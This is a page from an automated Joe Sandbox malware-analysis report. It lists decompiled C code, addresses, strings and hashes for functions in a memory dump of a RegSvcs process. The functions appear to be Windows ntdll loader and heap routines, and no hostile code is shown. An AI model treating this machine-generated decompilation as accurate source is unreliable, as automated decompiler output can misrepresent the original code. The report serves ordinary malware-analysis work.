Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: a5f490d2ee46542726814804c13f979af1471d9494cced557818cf41a8009cb2
Instruction ID: d33f0069ef4bd991dd97e9f0f38a6104a01a2b5c6e6b5eb6b720c0b71290b155
Opcode Fuzzy Hash: a5f490d2ee46542726814804c13f979af1471d9494cced557818cf41a8009cb2
Instruction Fuzzy Hash: E1610571A00201DFDB29DF28C441BAABBE6FF44314F29855EE8498F341D775E882EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00FC7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00FCCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00FBC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x10a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01035510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x10a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00FD7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00FD7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01037016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00FD7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00FD7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01037016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00FEA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00FBB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00fc7e4c
0x00fc7e50
0x00fc7e55
0x00fc7e58
0x00fc7e5d
0x00fc7e71
0x00fc7f33
0x00fc7e77
0x00fc7e77
0x00fc7e79
0x00fc7e79
0x00fc7e7e
0x00fc7f45
0x01019848
0x00000000
0x01019848
0x00fc7f4e
0x00fc7f53
0x00fc7f5a
0x00000000
0x00000000
0x0101985a
0x01019862
0x01019866
0x00000000
0x0101986c
0x00000000
0x0101986c
0x00fc7e84
0x00fc7e84
0x00fc7e8d
0x01019871
0x00fc7eb8
0x00fc7ec0
0x00fc7ec0
0x00fc7e9a
0x0101987e
0x00000000
0x00000000
0x01019884
0x0101988b
0x010198a7
0x010198ac
0x010198b1
0x010198b6
0x010198b8
0x010198b8
0x010198b9
0x00000000
0x010198b9
0x00fc7ea0
0x00fc7ea7
0x00000000
0x00000000
0x00fc7eac
0x00fc7eb1
0x00fc7ec6
0x00fc7ed0
0x010198cc
0x00fc7ed6
0x00fc7ed6
0x00fc7ed6
0x00fc7ede
0x00fc7ee3
0x010198e3
0x010198f0
0x01019902
0x010198f2
0x010198fb
0x010198fb
0x01019907
0x0101991d
0x0101991d
0x01019907
0x010198e3
0x00fc7ef0
0x00fc7f14
0x00fc7f14
0x00fc7f1e
0x01019946
0x00fc7f24
0x00fc7f24
0x00fc7f24
0x00fc7f2c
0x0101996a
0x01019975
0x01019975
0x0101997e
0x01019993
0x01019993
0x0101997e
0x00000000
0x00fc7ef2
0x00fc7efc
0x00fc7f0a
0x00fc7f0e
0x01019933
0x00000000
0x01019933
0x00000000
0x00fc7f0e
0x00000000
0x00000000
0x00000000
0x00fc7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01019891
minkernel\ntdll\ldrmap.c, xrefs: 010198A2
LdrpCompleteMapModule, xrefs: 01019898

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 463a2996fc7ef230f650bf77c116fd2e05a0fd662a8486931fdf84bd0eba1c7b
Instruction ID: b74c330c27fe5d8434e394114034bae27646f11fc537eeadea34d358f219490a
Opcode Fuzzy Hash: 463a2996fc7ef230f650bf77c116fd2e05a0fd662a8486931fdf84bd0eba1c7b
Instruction Fuzzy Hash: A4513332A08742DBEB21DB5DCA56F2A7BE5BF00324F140599E8919B3D1D778ED00EB91

Uniqueness

Uniqueness Score: -1.00%

Function 010623E3 Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E010623E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x10a874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x10a874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0100D4F0(_t83, 0xf96c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00FBB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x10a6378 = 1;
						asm("int3");
						 *0x10a6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x010623e3
0x010623e8
0x010623eb
0x010623ee
0x010623f3
0x0106259b
0x0106259b
0x0106259d
0x010625a3
0x010625a3
0x010623fb
0x01062424
0x0106244f
0x01062460
0x01062451
0x01062451
0x01062456
0x01062458
0x01062458
0x0106245b
0x0106245b
0x01062426
0x01062431
0x01062436
0x01062443
0x01062438
0x01062438
0x01062438
0x01062445
0x01062445
0x01062463
0x01062469
0x0106246f
0x01062480
0x01062495
0x010624a1
0x010624ce
0x010624df
0x010624d0
0x010624d0
0x010624d5
0x010624d7
0x010624d7
0x010624da
0x010624da
0x010624a3
0x010624b0
0x010624b5
0x010624c2
0x010624b7
0x010624b7
0x010624b7
0x010624c4
0x010624c4
0x010624e8
0x01062497
0x0106249a
0x0106249a
0x01062482
0x01062488
0x01062488
0x01062471
0x01062479
0x01062479
0x010624ef
0x010623fd
0x01062401
0x01062412
0x01062403
0x01062403
0x01062408
0x0106240a
0x0106240a
0x0106240d
0x0106240d
0x0106241b
0x0106241b
0x010624f1
0x010624f6
0x01062507
0x01062510
0x00000000
0x01062510
0x0106250b
0x00000000
0x010624f8
0x010624f8
0x010624fc
0x01062500
0x01062512
0x01062515
0x0106251a
0x01062521
0x01062524
0x01062529
0x0106252f
0x00000000
0x00000000
0x0106253c
0x0106255c
0x01062561
0x0106253e
0x01062554
0x01062559
0x0106256a
0x0106256d
0x01062574
0x01062586
0x01062588
0x0106258f
0x01062590
0x01062590
0x01062597
0x00000000
0x01062597

Strings

HEAP: , xrefs: 0106255C
HEAP[%wZ]: , xrefs: 0106254F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 0106256F

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: d11aa776c06bacc291c72ebebeac9f0d15f43d1aad4874228fc2f391575f769f
Instruction ID: 782f13329d052b56dbb6449c37d783ffcd70ba368059cb218961704d654a705d
Opcode Fuzzy Hash: d11aa776c06bacc291c72ebebeac9f0d15f43d1aad4874228fc2f391575f769f
Instruction Fuzzy Hash: 535147341002508AF3B4CE2EC8547767BF9EF48745F558899E8C28B285DB7AD883EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FBE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00FBF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00FF95D0();
						}
						if(_t78 != 0) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00FFFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00FFBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00FF9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00FFBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00FBF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00FFBB40(_t83, _t102 + 0x24, _t78);
								if(L00FC43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00FFBB40(_t84, _t102 + 0x24, _t94);
									if(L00FC43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00fbe620
0x00fbe628
0x00fbe62f
0x00fbe631
0x00fbe635
0x00fbe637
0x00fbe63e
0x01015503
0x01015503
0x00fbe64c
0x00fbe64c
0x00fbe651
0x00000000
0x00000000
0x00fbe661
0x00fbe665
0x0101542a
0x00fbe715
0x00fbe71a
0x00fbe71c
0x00fbe720
0x00fbe720
0x00fbe727
0x00fbe736
0x00fbe736
0x00fbe743
0x00fbe743
0x00fbe673
0x00fbe678
0x00fbe67d
0x00fbe682
0x00fbe685
0x00fbe692
0x00fbe69b
0x00fbe6a3
0x00fbe6ad
0x00fbe6b1
0x00fbe6b2
0x00fbe6bb
0x00fbe6bf
0x00fbe6c0
0x00fbe6c8
0x00fbe6cc
0x00fbe6d5
0x00fbe6d9
0x00000000
0x00000000
0x00fbe6e5
0x00fbe6ea
0x00fbe6f9
0x00fbe70b
0x00fbe70f
0x01015439
0x0101545e
0x0101545e
0x00000000
0x0101545e
0x0101543b
0x0101543e
0x01015440
0x01015445
0x01015472
0x01015475
0x0101548d
0x01015493
0x010154a9
0x00000000
0x00000000
0x010154ab
0x010154b4
0x010154bc
0x010154c8
0x010154de
0x010154fb
0x010154e0
0x010154e6
0x010154eb
0x010154eb
0x010154de
0x00000000
0x010154bc
0x01015477
0x0101547a
0x01015480
0x01015483
0x01015486
0x0101548b
0x00000000
0x00000000
0x00000000
0x0101548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01015447
0x01015447
0x01015447
0x01015447
0x0101544e
0x00000000
0x00000000
0x01015450
0x01015452
0x01015455
0x0101545a
0x00000000
0x00000000
0x00000000
0x0101545c
0x0101546a
0x0101546d
0x0101546f
0x00000000
0x0101546f
0x00fbe70f

Strings

@, xrefs: 00FBE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FBE68C
InstallLanguageFallback, xrefs: 00FBE6DB

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: e5cd22a2842fdf072d7b093354e871d4151e54ff6a55baef4a1c56953854e167
Instruction ID: 711226dcdf33220cb29f8857b5c6a4980f97b299b453ce72ea38e0ce24657805
Opcode Fuzzy Hash: e5cd22a2842fdf072d7b093354e871d4151e54ff6a55baef4a1c56953854e167
Instruction Fuzzy Hash: A951B1725083459BD710DF68C840BABB3E8BF89714F14096EFA95DB251FB38D904DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FDEB9A Relevance: 3.9, Strings: 3, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00FDEB9A(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				signed int _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t77;
				signed int* _t91;
				intOrPtr _t92;
				signed int _t95;
				signed char _t109;
				signed int _t114;
				unsigned int _t119;
				intOrPtr* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t92 = __ecx;
				_t122 = __edx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
					__eflags =  *(__edx + 8);
					if(__eflags != 0) {
						_t95 = _t95 + _t95;
					}
					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
					asm("btr eax, esi");
					_t92 = _v8;
				}
				_t62 = _t92 + 0xc0;
				_t127 =  *((intOrPtr*)(_t62 + 4));
				while(1) {
					L2:
					_v12 = _t127;
					if(_t62 == _t127) {
						break;
					}
					_t7 = _t127 - 8; // -8
					_t91 = _t7;
					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
						_t119 =  *(_t92 + 0x50) ^  *_t91;
						 *_t91 = _t119;
						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
						if(_t119 >> 0x18 != _t109) {
							_push(_t109);
							E0106FA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
						}
						_t92 = _v8;
					}
					_t114 =  *_t91 & 0x0000ffff;
					_t63 = _t122;
					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
					while(1) {
						_v20 = _t63;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t63;
						_v16 = _t130;
						_t127 = _v12;
						if(_t130 != 0) {
							_t63 = _v16;
							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
						L10:
						if( *_t122 != 0) {
							_t64 =  *((intOrPtr*)(_t122 + 4));
							__eflags = _t114 - _t64;
							_t65 = _t64 - 1;
							__eflags = _t65;
							if(_t65 < 0) {
								_t65 = _t114;
							}
							E00FDBC04(_t92, _t122, 1, _t127, _t65, _t114);
						}
						E00FDE4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
						if( *0x10a8748 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t77 =  *[fs:0x30];
								__eflags =  *(_t77 + 0xc);
								if( *(_t77 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E00FBB150();
								__eflags =  *0x10a7bc8;
								if(__eflags == 0) {
									__eflags = 1;
									E01072073(_t91, 1, _t122, 1);
								}
							}
							_t127 = _v12;
						}
						_t92 = _v8;
						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t62 = _t92 + 0xc0;
						goto L2;
					}
					_v16 = _t114;
					goto L10;
				}
				return _t62;
			}

0x00fdeb9a
0x00fdeba5
0x00fdeba7
0x00fdebaa
0x00fdebb3
0x00fdeca0
0x00fdeca1
0x00fdeca5
0x00fdecd1
0x00fdecd1
0x00fdecaa
0x00fdecc3
0x00fdecc9
0x00fdecc9
0x00fdebb9
0x00fdebbf
0x00fdebc2
0x00fdebc2
0x00fdebc2
0x00fdebc7
0x00000000
0x00000000
0x00fdebd1
0x00fdebd1
0x00fdebd4
0x00fdebd9
0x00fdebdd
0x00fdebe9
0x00fdebf0
0x01024258
0x0102425e
0x0102425e
0x00fdebf6
0x00fdebf6
0x00fdebf9
0x00fdebfc
0x00fdebfe
0x00fdec01
0x00fdec01
0x00fdec04
0x00000000
0x00000000
0x00fdec0a
0x00fdec0e
0x00fdec11
0x00fdec14
0x00fdec8f
0x00fdec92
0x00000000
0x00fdec92
0x00fdec1a
0x00fdec1d
0x00fdec20
0x00fdec72
0x00fdec75
0x00fdec77
0x00fdec77
0x00fdec78
0x00fdec7a
0x00fdec7a
0x00fdec83
0x00fdec83
0x00fdec32
0x00fdec3e
0x01024281
0x01024284
0x01024286
0x0102428c
0x01024290
0x010242af
0x010242b4
0x01024292
0x010242a7
0x010242ac
0x010242ba
0x010242bf
0x010242c4
0x010242cc
0x010242d0
0x010242d1
0x010242d1
0x010242cc
0x010242d6
0x010242d6
0x00fdec44
0x00fdec4b
0x00fdec55
0x00fdec5b
0x00fdec5b
0x00fdec5d
0x00fdec60
0x00000000
0x00fdec60
0x00fdec8a
0x00000000
0x00fdec8a
0x00fdec71

Strings

RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 010242BA
HEAP: , xrefs: 010242AF
HEAP[%wZ]: , xrefs: 010242A2

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: e9d6f31754c098029d9b368fe34e802a7e769b8b5f78da5184f5be030588510d
Instruction ID: 73c0a6c1c301cf5f68376174c73ce38cf7142114d50ca2170d4e8316ebbdc92c
Opcode Fuzzy Hash: e9d6f31754c098029d9b368fe34e802a7e769b8b5f78da5184f5be030588510d
Instruction Fuzzy Hash: F051CD31A10525EFCB14EF59C484B69BBB2FF85314F2981AAE8059F342D731AC42EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FDB8E4 Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00FDB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x10a8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00FBB150();
						} else {
							E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00FBB150();
						__eflags =  *0x10a7bc8;
						if(__eflags == 0) {
							E01072073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E00FDAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
